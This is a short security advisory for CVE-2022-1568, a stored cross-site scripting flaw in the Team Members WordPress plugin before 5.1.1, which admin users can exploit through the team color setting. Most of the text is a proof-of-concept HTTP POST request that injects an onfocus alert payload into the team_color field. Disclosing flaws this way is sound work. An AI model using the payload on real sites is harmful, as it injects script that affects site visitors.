Team Members < 5.1.1 – Admin+ Stored Cross-Site Scripting | CVE 2022-1568

Description

The plugin does not escape some of its Team settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed

Proof of Concept

The team_color field (ie "Main color" setting of a team) is affected

POST /wp-admin/post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 799
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

_wpnonce=13207515fa&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=tmm&original_post_status=auto-draft&auto_draft=&post_ID=6069&meta-box-order-nonce=66d1e9f3bf&closedpostboxesnonce=148d1a7663&post_title=Test&samplepermalinknonce=25926b035a&team_columns=3&team_piclink_beh=new&team_force_font=yes&team_color=%2381d742%22%20autofocus%20onfocus%3dalert(%2fXSS2%2f)%2f%2f&save=Save+Draft&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=05&jj=04&aa=2022&hh=08&mn=02&ss=58&hidden_mm=05&cur_mm=05&hidden_jj=04&cur_jj=04&hidden_aa=2022&cur_aa=2022&hidden_hh=08&cur_hh=08&hidden_mn=02&cur_mn=02&original_publish=Publish&dmb_tmm_meta_box_nonce=92f792d2d0&dmb_editor=&tmm_data_dumps%5B%5D=&post_name=